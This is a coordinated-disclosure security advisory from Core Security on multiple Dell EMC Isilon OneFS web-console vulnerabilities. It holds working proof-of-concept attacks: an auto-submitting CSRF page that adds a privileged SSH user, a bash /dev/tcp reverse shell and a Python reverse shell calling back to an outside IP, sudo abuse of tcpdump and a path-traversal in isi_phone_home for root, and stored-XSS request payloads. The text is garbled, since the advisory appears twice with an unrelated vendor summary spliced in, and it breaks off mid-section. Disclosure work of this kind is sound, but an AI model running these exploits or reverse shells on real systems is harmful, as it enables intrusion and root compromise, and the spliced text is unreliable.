IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site scripting in the Antivirus page** [CVE-2018-1189] The name parameter of the /antivirus/policies endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the Antivirus page. /----- POST /platform/3/antivirus/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 172 Cookie: isisessid=c6903f55-43e7-42e2-b587-9f68142c3e06; Connection: close {"name":"pepe<img src=x onerror=\"alert(1)\"/>","description":"pepito","enabled":true,"force_run":false,"impact":null,"paths":["/ifs"],"recursion_depth":-1,"schedule":null} -----/ 7.8. **Persistent cross-site scripting in the Job Operations page** [CVE-2018-1201] The description parameter of the /job/policies endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the Impact Policies section of the Job Operations page. /----- POST /platform/1/job/policies HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 210 Cookie: isisessid=8a5026c0-f045-4505-9d2b-ae83bc90f8ea; Connection: close {"name":"my policy","description":"<img src=x onerror=\"alert(1)\"/>","intervals":[{"begin":"Sunday 00:00","end":"Sunday 00:00","impact":"Low"},{"impact":"Low","begin":"Sunday 01:03","end":"Monday 01:01"}]} -----/ 7.9. **Persistent cross-site scripting in the NDMP page** [CVE-2018-1202] The name parameter of the /protocols/ndmp/users endpoint is vulnerable to cross-site scripting. After the name is updated, the payload will be executed every time the user opens the NDMP Settings section of the NDMP page. /----- POST /platform/3/protocols/ndmp/users HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 64 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"name":"<img src=x onerror=\"alert(1)\"/>","password":"123123"} -----/ 8. **Report Timeline** 2017-09-25: Core Security sent an initial notification to Dell EMC, including a draft advisory. 2017-09-26: Dell EMC confirmed reception and informed an initial response would be ready by October 5th. 2017-10-05: Dell EMC confirmed problem exists for all vulnerabilities reported except one, for which evaluation will be finalized soon. Dell EMC stated that, for the confirmed issues, a remediation plan will be provided by 10/16. 2017-10-05: Core Security thanked the follow up email. 2017-10-06: Dell EMC reported an update on one privilege escalation vulnerability reported, stating that 'ISI_PRIV_AUTH, and ISI_PRIV_ROLE both are equivalent to admin level access'. They said they will be updating the documentation to make it clearer. 2017-10-11: Core Security thanked for the clarification and confirmed that section will be removed from the final advisory. 2017-10-16: Dell EMC sent a schedule for fixing six of the reported vulnerabilities, with specific dates for every product's version. 2017-10-16: Core Security thanked the information and said it will analyze the proposals sent once all the data is available. 2017-10-19: Dell EMC sent a schedule for the remaining three reported vulnerabilities, with specific dates for every product's version. 2017-10-31: Core Security on the schedule sent, stating that fixing the vulnerabilities by June 2018 is unacceptable given current industry standards. Requested a review of the timeline or a thorough explanation that justifies such delay. 2017-11-01: Dell EMC answered back stating that after reviewing the original schedule, they said they believe they could have fixes ready for versions 8.0.x and 8.1.x by January 2018. Only caveat is the vulnerability 7.1 that might be pushed past January, although they said they think they could meet the January deadline. 2017-11-13: Core Security thanked Dell's review of the release dates and agreed on the proposed schedule, stating Core Security would like to publish a single advisory for all the vulnerabilities reported. Also requested CVE IDs for each of the issues. 2018-01-16: Core Security asked for a status update on the release date for the fixes since there was no update from Dell EMC. 2018-01-17: Dell EMC answered back stating they are awaiting confirmation from the product team about the exact dates of release. They said they will get back to us by the end of this week. Dell EMC also asked our GPG public key again. 2018-01-18: Core Security thanked for the update and sent the advisory's public GPG key. 2018-01-19: Dell EMC stated they are currently working on drafting their advisory and will send it back to us (including CVEs) once they have the necessary approvals. 2018-01-23: Dell EMC asked for our updated draft advisory. 2018-01-25: Dell EMC notified that the team are targeting to have the fix available by February 12th. Additionally, Dell will send its draft advisory by January 31th. 2018-01-29: Core Security thanked for the update and proposed February 14th as publication date. 2018-01-31: Dell EMC informed Core Security that they agreed to release on February 14th. They also provided CVE IDs for each vulnerability reported. 2018-02-01: Dell EMC sent its draft advisory. 2018-02-14: Advisory CORE-2017-0009 published. **References** [1] https://www.dellemc.com/en-us/storage/isilon/onefs-operating-system.htm 10. **About CoreLabs** CoreLabs, the research center of Core Security, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. **About Core Security** Core Security provides companies with the security insight they need to know who, how, and what is vulnerable in their organization. The company's threat-aware, identity & access, network security, and vulnerability management solutions provide actionable insight and context needed to manage security risks across the enterprise. This shared insight gives customers a comprehensive view of their security posture to make better security remediation decisions. Better insight allows organizations to prioritize their efforts to protect critical assets, take action sooner to mitigate access risk, and react faster if a breach does occur. Core Security is headquartered in the USA with offices and operations in South America, Europe, Middle East and Asia. To learn more, contact Core Security at (678) 304-4500 or info@coresecurity.com 12. **Disclaimer** The contents of this advisory are copyright (c) 2017 Core Security and (c) 2017 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/

Dell EMC Isilon versions between 8.1.0.0 - 8.1.0.1, 8.0.1.0 - 8.0.1.2, and 8.0.0.0 - 8.0.0.6, versions 7.2.1.x, and version 7.1.1.11 is affected by a cross-site scripting vulnerability in the Job Operations Page within the OneFS web administration interface. A malicious administrator may potentially inject arbitrary HTML or JavaScript code in the user's browser session in the context of the OneFS website. Dell EMC Isilon Contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. Dell EMC Isilon OneFS is prone to the following multiple security vulnerabilities. 1. A cross-site request-forgery vulnerability 2. A local privilege escalation vulnerability 3. A remote privilege escalation vulnerability 4. Multiple HTML-injection vulnerabilities Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or control how the site is rendered to the user or to gain elevated root privileges and perform certain unauthorized actions and gain access to the affected application. OneFS web administration interface is one of the web management interfaces. Note: In Isilon OneFS, running in compadmin mode, compadmin user is less privileged than the nodes' root users. CVSS v3 Base Score: 6.7 (AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H) Path Traversal Vulnerability (CVE-2018-1204) Dell EMC Isilon OneFS is affected by a path traversal vulnerability in the isi_phone_home tool. A malicious user may potentially exploit these vulnerability to send unauthorized requests to the server on behalf of authenticated users of the application. CVSS v3 Base Score: 8.8 (AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H) Resolution: The following Dell EMC Isilon OneFS maintenance releases addresses these vulnerabilities (except for CVE-2018-1213): Dell EMC Isilon OneFS 8.1.0.2 Patches are available for the below versions: Patch-213283 for OneFS 8.1.0.2 (CVE-2018-1213 only) Patch-217638 for OneFS 8.1.0.1 (all CVEs) Patch-213281 for OneFS 8.1.0.0 (all CVEs) Patch-213280 for OneFS 8.0.1.2 (all CVEs) Patch-213278 for OneFS 8.0.0.6 (all CVEs) Patch-217637 for OneFS 8.0.0.5 (all CVEs) Patch-211980 for OneFS 8.0.0.4 (all CVEs) IMPORTANT: If you update Isilon OneFS with a patch from this list, and you are using Insight IQ, you must upgrade to Insight IQ 4.1.2 prior to installing the patch. This advisory will be updated when fixes are available for additional versions. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2 iQEcBAEBCAAGBQJar7X8AAoJEHbcu+fsE81ZnVsH/RkfP2XUz4sHV2uQofuZR2bJ 319oyT9XVWUsOwCtQQ2ty/rolXHlO/B1viIq5OYJo4sTrN9s8dupz/Patek9HdiT RR0nvSVEgLM4C8NwB30hwJO8luuO8RDQUc3BQnSo6Vy8b1zM9F7A+yMZgseUoOaW u5jduNB8kvTAAyK4SnujqyBE4eT193x2yxAr15VoMRNFlmmu+S8GHpcCMoE0CDRt 05zhC6wCelN9BA0Bf7D533ffigfP8QAe+zw/OaQgQcEmoe5ys9aaHp2EJaAF5UZN Eh5JtXuwGX3dq0GDdVgbrA0ZlQlLConpBHhZEoIn99YF4MHpbp9l3QbeEYUS2ko= =c/8F -----END PGP SIGNATURE----- . **Advisory Information** Title: Dell EMC Isilon OneFS Multiple Vulnerabilities Advisory ID: CORE-2017-0009 Advisory URL: http://www.coresecurity.com/advisories/dell-emc-isilon-onefs-multiple-vulnerabilities Date published: 2018-02-14 Date of last update: 2018-02-14 Vendors contacted: Dell EMC Release mode: Coordinated release 2. **Vulnerability Information** Class: Cross-Site Request Forgery [CWE-352], Improper Privilege Management [CWE-269], Improper Privilege Management [CWE-269], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79], Improper Neutralization of Input During Web Page Generation [CWE-79] Impact: Code execution Remotely Exploitable: Yes Locally Exploitable: Yes CVE Name: CVE-2018-1213, CVE-2018-1203, CVE-2018-1204, CVE-2018-1186, CVE-2018-1187, CVE-2018-1188, CVE-2018-1189, CVE-2018-1201, CVE-2018-1202 3. **Vulnerability Description** Dell EMC's website states that:[1] The EMC Isilon scale-out NAS storage platform combines modular hardware with unified software to harness unstructured data. Powered by the OneFS operating system, an EMC Isilon cluster delivers a scalable pool of storage with a global namespace. The platform's unified software provides centralized Web-based and command-line administration to manage the following features: - A cluster that runs a distributed file system - Scale-out nodes that add capacity and performance - Storage options that manage files and tiering - Flexible data protection and high availability - Software modules that control costs and optimize resources Multiple vulnerabilities were found in the Isilon OneFS Web console that would allow a remote attacker to gain command execution as root. **Vulnerable Packages** . Dell EMC Isilon OneFS version 8.1.1.0 (CVE-2018-1203, CVE-2018-1204) . Dell EMC Isilon OneFS versions between 8.1.0.0 - 8.1.0.1 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.1.0 - 8.0.1.2 (all CVEs) . Dell EMC Isilon OneFS versions between 8.0.0.0 - 8.0.0.6 (all CVEs) . Dell EMC Isilon OneFS versions 7.2.1.x (CVE-2018-1186, CVE-2018-1188, CVE-2018-1201, CVE-2018-1204, CVE-2018-1213) . https://support.emc.com/downloads/15209_Isilon-OneFS 6. **Credits** These vulnerabilities were discovered and researched by Ivan Huertas and Maximiliano Vidal from Core Security Consulting Services. The publication of this advisory was coordinated by Alberto Solino from Core Advisories Team. **Technical Description / Proof of Concept Code** The Web console contains several sensitive features that are vulnerable to cross-site request forgery. We describe this issue in section 7.1. Sections 7.2 and 7.3 show two vectors to escalate privileges to root. Various persistent cross-site scripting issues are presented in the remaining sections (7.4, 7.5, 7.6, 7.7, 7.8, 7.9). **Cross-site request forgery leading to command execution** [CVE-2018-1213] There are no anti-CSRF tokens in any forms on the Web interface. This would allow an attacker to submit authenticated requests when an authenticated user browses an attacker-controlled domain. The Web console contains a plethora of sensitive actions that can be abused, such as adding new users with SSH access or re-mapping existing storage directories to allow read-write-execute access to all users. All requests are JSON-encoded, which in some cases might hinder exploitation of CSRF vulnerabilities. However, the application does not verify the content-type set. This allows an attacker to exploit the CSRF vulnerabilities by setting a text/plain content-type and sending the request body as JSON_PAYLOAD=ignored. The following proof of concept creates a new user and assigns him a new role with enough privileges to log in via SSH, configure identifies, manage authentication providers, configure the cluster and run the remote support tools. /----- <html> <body> <form id="addUser" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/users?query_member_of=true&resolve_names=true&start=0&zone=System&provider=lsa-local-provider%3ASystem" method="POST" enctype="text/plain"> <input type="hidden" name="{"name":"pepito","enabled":true,"shell":"/bin/zsh","password_expires":false,"password":"pepito"}" value="" /> </form> <form id="addRole" target="_blank" action="https://192.168.1.11:8080/platform/1/auth/roles" method="POST" enctype="text/plain"> <input type="hidden" name="{"members":[{"name":"pepito","type":"user"}],"name":"pepito_role","privileges":[{"id":"ISI_PRIV_AUTH","name":"Auth","read_only":false},{"id":"ISI_PRIV_CLUSTER","name":"Cluster","read_only":false},{"id":"ISI_PRIV_REMOTE_SUPPORT","name":"Remote Support","read_only":false},{"id":"ISI_PRIV_LOGIN_SSH","name":"SSH","read_only":true}]}" value="" /> </form> <script> document.getElementById("addUser").submit(); window.setTimeout(function() { document.getElementById("addRole").submit() }, 1000); </script> </body> </html> -----/ 7.2. **Privilege escalation due to incorrect sudo permissions** [CVE-2018-1203] The compadmin user can run the tcpdump binary with root privileges via sudo. This allows for local privilege escalation, as tcpdump can be instructed to run shell commands when rotating capture files. /----- pepe-1$ id uid=11(compadmin) gid=0(wheel) groups=0(wheel),1(daemon) pepe-1$ cat /tmp/lala.sh #!/bin/bash bash -i >& /dev/tcp/192.168.1.66/8888 0>&1 -----/ Once the desired shell script is in place, the attacker can run tcpdump as follows to trigger the execution: /----- pepe-1$ sudo tcpdump -i em0 -G 1 -z /tmp/lala.sh -w dump tcpdump: WARNING: unable to contact casperd tcpdump: listening on em0, link-type EN10MB (Ethernet), capture size 65535 bytes /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused /tmp/lala.sh: connect: Connection refused /tmp/lala.sh: line 3: /dev/tcp/192.168.1.66/8888: Connection refused -----/ As can be seen below, the script runs with root privileges: /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 57692) bash: no job control in this shell [root@pepe-1 /compadmin]# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.3. **Privilege escalation via remote support scripts** [CVE-2018-1204] >From the documentation: "OneFS allows remote support through EMC Secure Remote Services (ESRS) which monitors your EMC Isilon cluster, and with your permission, allows remote access to Isilon Technical Support personnel to gather cluster data and troubleshoot issues." "After you enable remote support through ESRS, Isilon Technical Support personnel can request logs with scripts that gather EMC Isilon cluster data and then upload the data. The remote support scripts based on the Isilon isi_gather_info log-gathering tool are located in the /ifs/data/Isilon_Support/ directory on each node." "Additionally, isi_phone_home, a tool that focuses on cluster- and node-specific data, is enabled once you enable ESRS. This tool is pre-set to send information about your cluster to Isilon Technical Support on a weekly basis. You can disable or enable isi_phone_home from the OneFS command-line interface." As a cluster administrator or compadmin, it is possible to enable the remote support functionality, hence enabling the isi_phone_home tool via sudo. This tool is vulnerable to a path traversal when reading the script file to run, which would enable an attacker to execute arbitrary python code with root privileges. If remote support is not enabled, an attacker could perform the following operations in order to enable it: /----- pepe-1$ sudo isi network subnets create 1 ipv4 1 pepe-1$ sudo isi network pools create 1.0 pepe-1$ sudo isi remotesupport connectemc modify --enabled=yes --primary-esrs-gateway=10.10.10.10 --use-smtp-failover=no --gateway-access-pools=1.0 -----/ The isi_phone_home tool is supposed to run scripts located in the root-only writable directory /usr/local/isi_phone_home/script. However, the provided script name is used to construct the file path without sanitization, allowing an attacker to reference other locations. /----- def run_script(script_file_name): script_path = CFG.get('SCRIPTDIR') + '/' + script_file_name if os.path.isfile(script_path): cmd = 'python ' + script_path + ' 2>&1 ' command_thread = command.Command(cmd) exit_code, output = command_thread.run(int(CFG.get("SCRIPT_TIEMOUT"))) if exit_code: logging.error("Error: {0} running script: {1} ".format(str(exit_code), output)) else: logging.error("File: {0} list_file_name doesn't exist ".format(script_path)) -----/ The final step would be to create a malicious python script on any writable location and call it via the isi_phone_tool using sudo. Keep in mind that the previous steps are not required if the system does already have remote support enabled. /----- pepe-1$ cat /tmp/lala.py #!/usr/bin/env python import socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("192.168.1.66",8888)) os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"]) pepe-1$ sudo /usr/bin/isi_phone_home --script-file ../../../../../tmp/lala.py -----/ /----- $ nc -lvp 8888 Listening on [0.0.0.0] (family 0, port 8888) Connection from [192.168.1.11] port 8888 [tcp/*] accepted (family 2, sport 56807) pepe-1# id uid=0(root) gid=0(wheel) groups=0(wheel),5(operator),10(admin),20(staff),70(ifs) -----/ 7.4. *Persistent cross-site scripting in the cluster description* [CVE-2018-1186] The description parameter of the /cluster/identity endpoint is vulnerable to cross-site scripting. After the cluster's description is updated, the payload will be executed every time the user opens the Web console. /----- PUT /platform/3/cluster/identity HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json X-Requested-With: XMLHttpRequest Content-Length: 61 Cookie: isisessid=91835dd1-49de-4d40-9f09-94f6d029df24; Connection: close {"description":"my cluster<img src=x onerror=\"alert(1)\"/>"} -----/ 7.5. **Persistent cross-site scripting in the Network Configuration page** [CVE-2018-1187] The description parameter of the /network/groupnets endpoint is vulnerable to cross-site scripting. After the description is updated, the payload will be executed every time the user opens the network configuration page. /----- POST /platform/4/network/groupnets HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 186 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"description":"lala<script>alert(1)</script>","dns_cache_enabled":true,"dns_options":[],"dns_search":[],"dns_servers":[],"name":"pepito2","server_side_dns_search":false} -----/ 7.6. **Persistent cross-site scripting in the Authentication Providers page** [CVE-2018-1188] The realm parameter of the /auth/settings/krb5/realms endpoint is vulnerable to cross-site scripting. After the realm is updated, the payload will be executed every time the user opens the Kerberos tab of the Authentication Providers page. /----- POST /platform/1/auth/settings/krb5/realms HTTP/1.1 Host: 192.168.1.11:8080 User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:55.0) Gecko/20100101 Firefox/55.0 Accept: */* Accept-Language: en-US,en;q=0.5 Content-Type: application/json Content-Length: 78 Cookie: isisessid=31f92221-15bb-421d-be00-d2bf42964c41; Connection: close {"is_default_realm":true,"kdc":[],"realm":"ASDASD<img src=x onerror=alert(1)"} -----/ 7.7. **Persistent cross-site 